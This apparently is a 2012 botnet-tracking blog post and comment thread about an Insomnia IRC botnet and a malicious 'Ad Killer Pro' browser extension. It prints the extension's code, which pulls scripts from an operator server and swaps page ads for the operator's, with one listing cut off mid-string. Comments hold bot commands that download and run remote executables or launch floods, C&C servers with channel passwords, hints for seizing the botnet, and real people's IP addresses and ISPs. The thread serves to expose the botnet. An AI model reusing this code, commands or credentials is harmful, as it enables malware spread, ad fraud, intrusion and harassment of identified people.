insomnia.incorporatedhosting.info (Insomnia bot hosted in the United Kingdom, OVH Systems)

This botnet was found by our anonymous friend here;
all credits go to him for this.

Server Port
insomnia.incorporatedhosting.info:5656

Channel:
#insomnia k6geyzs

Botnet owner:
Digital from HF and friends

Here is the Lilyjade extension named Ad Killer Pro (found by our anonymous friend)

//New Lilyjade extension
//Named: Ad Killer Pro
//CrosRider #:4995
//Panel: http://nemsmedia.cloudapp.net

//Extension
appAPI.ready(function($) {
// NOTE(review): `@include` is not JavaScript syntax; presumably a CrossRider
// build-time directive that inlines each remote script into the extension
// bundle — confirm against the CrossRider documentation. Two of the three
// scripts come from the panel host named above, the third from a bare IP;
// everything below is therefore whatever those hosts serve at build time.
@include "http://nemsmedia.cloudapp.net/Scripts/jquery-1.5.1.min.js"
@include "http://nemsmedia.cloudapp.net/GetExtension.js"
@include "http://46.105.227.94/aab.js"

});



//http://nemsmedia.cloudapp.net/GetExtension.js
// Copy of document.body.innerHTML taken by the last chkAds() pass; chkAds()
// returns early when the page has not changed since then.
var htmlsrc = "";
// Origin of the operator's server. aURL() builds the URLs that matching
// iframes are re-pointed at from this value.
var ROOTSERVER = 'http://nemsmedia.cloudapp.net';
// Path under ROOTSERVER that aURL() appends the format id to; what that
// endpoint actually serves is not shown in this listing.
var SRCSCR = '/Extension/GetAds';

// Entry point of GetExtension.js: schedules initWindow() for DOM-ready and
// also calls it immediately if the document has already finished loading.
// initWindow() is not defined anywhere in the visible part of this listing.
function init() {
    // Load Calls
    $(document).ready(function() { initWindow(); });
    // Check post-load for ready (may need timer later)
    var s = document.readyState,
        // getLast is assigned but never used in this function.
        getLast = function(){ var elms = document.getElementsByTagName('*'); return elms[elms.length - 1]; };
    if (s === 'complete'){ initWindow(); }
}

// Functions

// Build the URL a matched ad slot is re-pointed at: ROOTSERVER + SRCSCR + '/' + format id.
function aURL(fmid) { return ROOTSERVER + SRCSCR + '/' + fmid; }

// Map a width/height pair to a numeric format id (1-17); 0 when the size is
// not in the table. The sizes listed are common display-ad slot dimensions.
// `obj` is accepted but never read. Note the `return` inside `finally`: it
// runs on every path, so even an exception thrown in the chain yields `fid`.
function findFID(w, h, obj) {
    var fid = 0;
    try {
        if ((w == 300) && (h == 250)) { fid = 1; }
        else if ((w == 160) && (h == 600)) { fid = 2; }
        else if ((w == 728) && (h == 90)) { fid = 3; }
        else if ((w == 336) && (h == 280)) { fid = 4; }
        else if ((w == 468) && (h == 60)) { fid = 5; }
        else if ((w == 234) && (h == 60)) { fid = 6; }
        else if ((w == 120) && (h == 90)) { fid = 7; }
        else if ((w == 120) && (h == 600)) { fid = 8; }
        else if ((w == 120) && (h == 240)) { fid = 9; }
        else if ((w == 250) && (h == 250)) { fid = 10; }
        else if ((w == 180) && (h == 150)) { fid = 11; }
        else if ((w == 200) && (h == 200)) { fid = 12; }
        else if ((w == 125) && (h == 125)) { fid = 13; }
        else if ((w == 728) && (h == 15)) { fid = 14; }
        else if ((w == 468) && (h == 15)) { fid = 15; }
        else if ((w == 180) && (h == 90)) { fid = 16; }
        else if ((w == 160) && (h == 90)) { fid = 17; }
    } catch (z) { }
    finally { return fid; }
}

// Scan the page for iframes and <object> elements whose declared size matches
// the findFID() table and re-point / replace them with content from
// ROOTSERVER (this is the ad-replacement behaviour of the extension).
// Skips the whole pass when body.innerHTML is unchanged since the last call.
function chkAds() {
    if(document.body.innerHTML == htmlsrc) { return; }
    htmlsrc = document.body.innerHTML;
    // Implicit global (no `var`); not referenced in the visible listing,
    // presumably used in the truncated remainder.
    domid = "fm_sponsor";
    /* TODO
     *    Optimize timers to prevent slow down
     *
     *    Add to:
     *     Ebay
     *     Amazon
     *     Blogger
     *     Netflix
     *     Walmart
     *     Best Buy
     */
    /* ******************* */
    /* *** Enumeration *** */
    /* ******************* */
    // Enumerate iframes
    // The `ld` attribute marks frames already processed so the
    // [ld!="true"] selector skips them on later passes.
    $('iframe[ld!="true"]').each( function(i) {
        try {
            $(this).attr("ld", "true");
            // NOTE(review): parseInt without a radix; yields NaN for
            // percentage/missing sizes, which findFID() maps to 0.
            var h = parseInt($(this).attr('height'));
            var w = parseInt($(this).attr('width'));
            var fid = 0;
            fid = findFID(w, h, $(this).attr('id'));
            // Update iframe
            // Matched frames are enlarged by 10px each way and their src
            // swapped for the operator's URL.
            if (fid > 0) {
                $(this).attr('height', h+10).attr('width', w+10).attr('src', aURL(fid));
            }
        } catch (z) { }
    });
    // Enumerate Flash
    $('object[ld!="true"]').each( function(i) {
        try {
            var h = parseInt($(this).attr('height'));
            var w = parseInt($(this).attr('width'));
            var fid = 0;
            fid = findFID(w, h, this);
            // Update object
            // NOTE(review): the listing is cut off here by the page (the
            // replacement markup inside the string, and everything after
            // it, was dropped); the unterminated string below is as posted.
            if (fid > 0) {
                $(this).replaceWith('



//http://46.105.227.94/aab.js
<style>
    #cf0d {
        position:fixed!important;
        position:absolute;
        top:0;
        top:expression((t=document.documentElement.scrollTop?document.documentElement.scrollTop:document.body.scrollTop)+"px");
        left:0;
        width:100%;
        height:100%;
        background-color:#fff;
        opacity:0.9;
        filter:alpha(opacity=90);
        display:block
    }
    #cf0d p {
        opacity:1;
        filter:none;
        font:bold 16px Verdana, Arial, sans-serif;
        text-align:center;
        margin:20% 0
    }
    #cf0d p a, #cf0d p i {
        font-size:12px
    }
    #cf0d ~ * {
        display:none
    }
</style>
<noscript>
    <i id=cf0d>
        <p>Please enable JavaScript!
            <br>Bitte aktiviere JavaScript!
            <br>S'il vous pla&icirc;t activer JavaScript!
            <br>Por favor,activa el JavaScript!
            <br>
        </p>
    </i>
</noscript>
<script>
    // Ad-blocker detector (the "antiblock.org v2.2.2" script named in the
    // overlay link below). Invoked with only `window`, so `u` is undefined
    // and `z` holds the string 'undefined' for the typeof comparisons. When
    // any of the three probes in cf0d() decides a blocker is active, f()
    // injects the full-page overlay #cf0d; the `#cf0d ~ *` rule in the
    // stylesheet above then hides every element after it.
    (function (w, u) {
        var d = w.document,
            z = typeof u;

        // Runs once on window load (registered at the bottom).
        function cf0d() {
            // Insert an <i> element holding markup `c` into <body>. With an
            // id (the overlay case) the body margin/padding are zeroed, its
            // height set to 100% and the insertion index chosen at random;
            // without an id the element goes before the last body child.
            function c(c, i) {
                var e = d.createElement('i'),
                    b = d.body,
                    s = b.style,
                    l = b.childNodes.length;
                if (typeof i != z) {
                    e.setAttribute('id', i);
                    s.margin = s.padding = 0;
                    s.height = '100%';
                    l = Math.floor(Math.random() * l) + 1
                }
                e.innerHTML = c;
                b.insertBefore(e, b.childNodes[l - 1])
            }
            // Lookup helper: by id when `t` is absent, else by tag name.
            function g(i, t) {
                return !t ? d.getElementById(i) : d.getElementsByTagName(t)
            };

            // Show the overlay once (no-op if #cf0d already exists). `v`
            // names the probe that tripped and is appended, escaped, to the
            // antiblock.org link in the overlay.
            function f(v) {
                if (!g('cf0d')) {
                    c('<p>Please disable your ad blocker!<br>Bitte deaktiviere Deinen Werbeblocker!<br>Veuillez d&eacute;sactiver votre bloqueur de publicit&eacute;!<br>Por favor, desactive el bloqueador de anuncios!<br><a href="http://antiblock.org/?d=2.2.2' + '___' + escape(v) + '">antiblock.org</a> <i>v2.2.2</i></p>', 'cf0d')
                }
            };
            // Probe 1: bait elements. Empty anchors with ad-like ids are
            // added where the page lacks them; if any is then detached
            // (offsetParent null) or display:none, report it.
            (function () {
                var a = ['ad-728x90-top0', 'ad_global_header2', 'adclear', 'adspot-1x4', 'body_728_ad', 'coverADS', 'sb_advert', 'ad', 'ads', 'adsense'],
                    l = a.length,
                    i, s = '',
                    e;
                for (i = 0; i < l; i++) {
                    if (!g(a[i])) {
                        s += '<a id="' + a[i] + '"></a>'
                    }
                }
                c(s);
                l = a.length;
                for (i = 0; i < l; i++) {
                    e = g(a[i]);
                    // currentStyle is the legacy-IE fallback for getComputedStyle.
                    if (e.offsetParent == null || (w.getComputedStyle ? d.defaultView.getComputedStyle(e, null).getPropertyValue('display') : e.currentStyle.display) == 'none') {
                        return f('#' + a[i])
                    }
                }
            }());
            // Probe 2: URL bait. The page's first <img> is loaded again;
            // once that succeeds its src is re-set with a fragment built
            // from ad-like path strings, and an error on that second load
            // (presumably a URL-pattern filter) is reported.
            (function () {
                var t = g(0, 'img'),
                    a = ['/ad_fill.', '/ad_homepage_', '/adpoint.', '/ads/leaderboard.', '/i/ads/ad', '/mint/ads/ad', '_advertisements/', '_btnad_', '_tile_ad_', '/120x600_'],
                    i;
                if (typeof t[0] != z && typeof t[0].src != z) {
                    i = new Image();
                    i.onload = function () {
                        // Assigns the string held in `z`, not undefined —
                        // presumably meant to detach the handler; verify.
                        this.onload = z;
                        this.onerror = function () {
                            f(this.src)
                        };
                        this.src = t[0].src + '#' + a.join('')
                    };
                    i.src = t[0].src
                }
            }());
            // Probe 3: re-fetch a known ad-network script. The last <script>
            // whose src is a key of `o` is cloned and re-inserted; `v` is
            // the page global that network's loader consumes. w[v] is reset
            // to undefined first, set to null once the clone has loaded with
            // w[v] still undefined, and if it is anything but null 2 s later
            // the load is treated as blocked. Only the first match is probed
            // (`break`). Side effect on the host page: document.write is
            // nulled so the re-executed loader cannot write into the page.
            (function () {
                var o = {
                    'http://pagead2.googlesyndication.com/pagead/show_ads.js': 'google_ad_client',
                    'http://js.adscale.de/getads.js': 'adscale_slot_id',
                    'http://get.mirando.de/mirando.js': 'adPlaceId'
                },
                    S = g(0, 'script'),
                    l = S.length - 1,
                    n, r, i, v, s;
                d.write = null;
                for (i = l; i >= 0; --i) {
                    s = S[i];
                    if (typeof o[s.src] != z) {
                        n = d.createElement('script');
                        n.type = 'text/javascript';
                        n.src = s.src;
                        v = o[s.src];
                        w[v] = u;
                        r = S[0];
                        // readyState checks cover legacy IE's onreadystatechange path.
                        n.onload = n.onreadystatechange = function () {
                            if (typeof w[v] == z && (!this.readyState || this.readyState === "loaded" || this.readyState === "complete")) {
                                n.onload = n.onreadystatechange = null;
                                r.parentNode.removeChild(n);
                                w[v] = null
                            }
                        };
                        r.parentNode.insertBefore(n, r);
                        setTimeout(function () {
                            if (w[v] !== null) {
                                f(n.src)
                            }
                        }, 2000);
                        break
                    }
                }
            }())
        }
        // attachEvent is the legacy-IE fallback for addEventListener.
        if (d.addEventListener) {
            w.addEventListener('load', cf0d, false)
        } else {
            w.attachEvent('onload', cf0d)
        }
    })(window);
</script>

Hosting info:
http://whois.domaintools.com/176.31.208.105

22 Comments

  • Anonymous says:

    Got some logs from it. Here is the channel:http://pastebin.com/1CwU6rXB
    Notice how everything is being russkilled
    Most interesting thing was another lilyjade
    Infos here:http://pastebin.com/NMkqqu1k
    Notice support for two german ad networks adscale.de and mirando.de has been added.

    Also, here are some of the things downloaded by a single bot that was loaded on. I'm surprised their bots last more than a day or two.
    http://pastebin.com/QZxpHF6w
    https://imgur.com/y1XGV

  • Synn says:

    Lovely 🙂

    Found this a few minutes before you posted it.

    For those looking to take it over, or want to brute for the oper PW, oper UN is Digital

  • Synn says:

    * Now talking on #insomnia
    * Topic for #insomnia is: eWJ2SnRjaXB5TDdJdXNpL3lidklzOGl2eUsvSXE4bWh5YlRKdE1pL3lMZkp0Y2kveUtuSXRNaXJ5TG5JdE1panliWEl1TWkweUxiSnRNaXV5YlRKcjhtaXlhUEpxc21zeWFySnFjbXZ5YlRJcjhpMHlLdklzc2k0eWJYSXI4aWp5Sy9JcHc9PXw0NjAwODYwMw==
    * Topic for #insomnia set by __Digital__ at Fri May 25 07:19:06 2012
    .layer4 37.59.238.173 80 200
    * You are now known as n{US|XP-64a}askgwi
    .stop
    .stop
    .bk

  • Anonymous says:

    I BET YOU ALL FEEL SPECIAL 🙂 WELL ENJOY THE INFO CAUSE I WONT CHANGE IT 🙂 AND GOOD LUCK GETTING ANYTHING FROM IT 🙂

  • Pig says:

    sorry i was not online, that's why posts are showing up now lol

  • Anonymous says:

    Lily Jade pastebin is down. Here it is again, with a mirror as well.
    http://pastebin.com/ubS6h2Cg
    http://hpaste.org/69070

  • Anonymous says:

    hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203

  • Pig says:

    i m adding the code to the post so u dont have to re-upload this again
    very nice job from you "anonymous" guy lol

  • Anonymous says:

    Thanks. May as well dump these as well.
    4thdemo.com:3344 785chelsea #Insomnia
    4thdemo.com:5443 alexandre69 #Channel Password
    4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie
    4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric
    All are separate irc servers, but hosted on the same server. Some HF hecker selling to skids.
    Oh, its DeMoNi
    * [DeMoNi] (DeMoNi@hiddenhost-8017995A.w90-7.abo.wanadoo.fr): …
    * [DeMoNi] #Jamie #Insomnia
    * [DeMoNi] jackirc.network :jackirc
    * [DeMoNi] idle 15:11:50, signon: Sat May 26 02:46:16
    * [DeMoNi] End of WHOIS list.
    * [r3m0h] (R3m0h@r3de): …
    * [r3m0h] #Insomnia
    * [r3m0h] jackirc.network :jackirc
    * [r3m0h] is a Network Administrator
    * [r3m0h] is available for help.
    * [r3m0h] idle 04:40:05, signon: Sat May 26 13:18:01
    * [r3m0h] End of WHOIS list.
    Most only have like 10 bots at peak times.

  • Pig says:

    from what i see demoni looks like arab hacker living in france lol he use his real ip

  • Anonymous says:

    Haha demoni ^^
    ".abo.wanadoo."
    lols

  • Synn says:

    "Anonymous said…
    hey SYN heres to you 🙂 sense ya were stupid and used your ip 70.134.52.203"

    That's my IP?

    🙂 Dynamic IP addy ftw. I saw that you tried to DDoS me.

    Router is modified to change my MAC if i get a flood. Took me 15 seconds to "Mitigate" your attack.

    Oh, and tell "Kid" that running ddos attacks, and killing 100+ bots is bad for botnets. Def. when you only haz 500 boats 🙁 (trollface.jpg)

    Btw, i have your oper password.

  • Anonymous says:

    Someone trying to load a ngrbot net off it, located at 46.166.162.130:1993 #ngrs scrt
    File: dl.dropbox.com/s/h19bp0niuc3lt23/ngr.exe
    Another insomnia net also installed on it, located at dk1.zapto.org:6667 #bots owner of this is iDDoS@pie69, file is: http://dl.dropbox.com/u/23547833/lmfao.exe
    Thanks for keeping all the info the same you dumb fucks. All your exes go straight to virustotal.

  • Anonymous says:

    Also, just posted, .dl https://dl.dropbox.com/u/61771932/BsVapor.exe
    Hmm, blackshades. Lets see what the no-ip is. veprex.no-ip.org. Where does that point to? 99.44.92.31. I bet it's a vpn, no lead here. Lets look it up http://whois.domaintools.com/99.44.92.31
    What? AT&T Houston internet services?
    Vapor (The guy who is really into bitcoins) is a dumb fuck who lives in Houston and hosts shit on his own ip.

  • Pig says:

    i m opening new thread with these 2 nets
    keep raping them lol

  • Anonymous says:

    Successful i4i
    Jun 08 21:44:06 <__Digital__> .j #i4i
    #i4i
    <__Digital__> .dl http://up2x.com/u/633370693.68b6ce3688_file.exe
    <__Digital__> .dl http://up2x.com/u/949765942.unknown.exe iunknownv1.no-ip.info:3102
    Jun 08 22:15:31 <__Digital__> .bk

    Bonus: can any one guess what server this one came from? It hasn't been posted here, yet…
    Jun 08 22:58:27 .ruskill on
    Jun 08 22:58:29 .dl http://up2x.com/u/949765942.unknown.exe

  • Pig says:

    they keep using no-ip all time lol
    nice work again
    if u want to post directly here come on irc.abjects.net channel #security and tell me you nick name(i will add you to posters in the blog)

  • Anonymous says:

    I'm banned
    * Cannot join #security (You are banned).
    If you can unban Userbased, I would be glad.
    Also, I meant to post this weeks ago, but the post must have gotten swallowed
    http://www.mediafire.com/?5rggorwl7gi8dwt
    Password: virus
    Loads of logs and samples. Some ircs as well, though some are down by now.
    You can post it if you want to, or just throw the samples in with your next release.

  • Anonymous says:

    funny, a lot of this information is wrong 😀

  • Anonymous says:

    you stupid fucks still aint managed to take it over yet nor will you lmfao all tor ranges have been banned against the server so well enjoy trying lmfao you can keep watching tho it makes me feel oh so special <3

  • Pig says:

    little noob u really think tor is the only alternative when it comes to exposing lamers like u ? lol

  • Anonymous says:

    Then why haven't you taken it over yet?